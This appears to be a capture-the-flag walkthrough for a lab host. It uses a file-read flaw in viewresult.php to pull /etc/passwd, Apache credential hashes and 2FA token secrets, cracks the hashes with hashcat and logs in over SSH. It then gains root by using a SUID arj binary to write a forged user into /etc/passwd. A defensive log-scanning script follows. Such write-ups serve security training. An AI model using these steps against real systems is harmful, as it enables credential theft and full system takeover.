http://192.168.145.144
Basic login:
admin:admin
In page source:
<!-- itemir/apache_2fa -->
POST /checkpost.php HTTP/1.1
...
job=ps
The response:
HTTP/1.1 302 Found
Location: /index.php?workon=am9iPXBz
am9iPXBz -> Base64-decoded: job=ps
View Result -> /spool/viewresult.php?view=192.168.49.145_1639874661.txt
- /viewresult.php?view=/etc/passwd
fox:x:1000:1000::/home/fox:/bin/sh
- /viewresult.php?view=/etc/apache2/apache2.conf
- /viewresult.php?view=/etc/apache2/sites-enabled/000-default.conf
AuthUserFile /opt/apache_2fa/apache_credentials
- /viewresult.php?view=/opt/apache_2fa/apache_credentials
admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$[REDACTED]
$ hashcat -m 1600 -w 4 -a 0 hash.txt ~/Desktop/rockyou.txt --force
admin:admin
fox:[REDACTED]
$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:?
/viewresult.php?view=/opt/apache_2fa/tokens.json
{
"admin": "ND4LKCSFMUQISO6CBZQATLDP",
"fox": "[REDACTED]"
}
Add -> Manual Entry -> Use this secret: "[REDACTED]" to generate the code.
$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj
$ cd /tmp
$ cp /etc/passwd passwd
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd
$ arj x priv.arj /etc/
→ Yes
$ su ch
Password: pass123
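
Defender's view of the viewresult.php?view= requests above, as an added example (not part of the original notes and not the application's code): an allow-list for the view parameter, run over access-log lines to flag reads outside the spool directory. The <ip>_<epoch>.txt naming rule is an assumption taken from the one legitimate request shown; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate result files are named <client-ip>_<epoch>.txt,
# as in the single legitimate "View Result" link shown in the notes.
SPOOL_NAME = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}_\d+\.txt")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def view_values(log_line):
    """Return the URL-decoded `view` values of a viewresult.php request line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/viewresult.php"):
        return []
    # parse_qs percent-decodes, so %2Fetc%2Fpasswd is compared as /etc/passwd
    return parse_qs(url.query, keep_blank_values=True).get("view", [])

def is_allowed(view):
    """Allow-list a hardened handler would apply before opening the file.
    fullmatch() rejects anything with a slash, dot-dot or a trailing suffix."""
    return SPOOL_NAME.fullmatch(view) is not None

def suspicious_requests(log_lines):
    """Return (line, value) for every `view` value outside the allow-list."""
    hits = []
    for line in log_lines:
        for value in view_values(line):
            if not is_allowed(value):
                hits.append((line, value))
    return hits

# Constructed sample access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '192.168.49.145 - admin [19/Dec/2021:00:44:21 +0000] "GET /spool/viewresult.php?view=192.168.49.145_1639874661.txt HTTP/1.1" 200 512',
    '192.168.49.145 - admin [19/Dec/2021:00:45:02 +0000] "GET /spool/viewresult.php?view=/etc/passwd HTTP/1.1" 200 1834',
    '192.168.49.145 - admin [19/Dec/2021:00:46:10 +0000] "GET /spool/viewresult.php?view=%2Fopt%2Fapache_2fa%2Ftokens.json HTTP/1.1" 200 96',
    '192.168.49.145 - admin [19/Dec/2021:00:48:00 +0000] "GET /index.php?workon=am9iPXBz HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for line, value in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT view={value!r} :: {line}")
```

The same is_allowed() rule belongs in the handler itself, so the request is refused before any file is opened rather than only flagged afterwards.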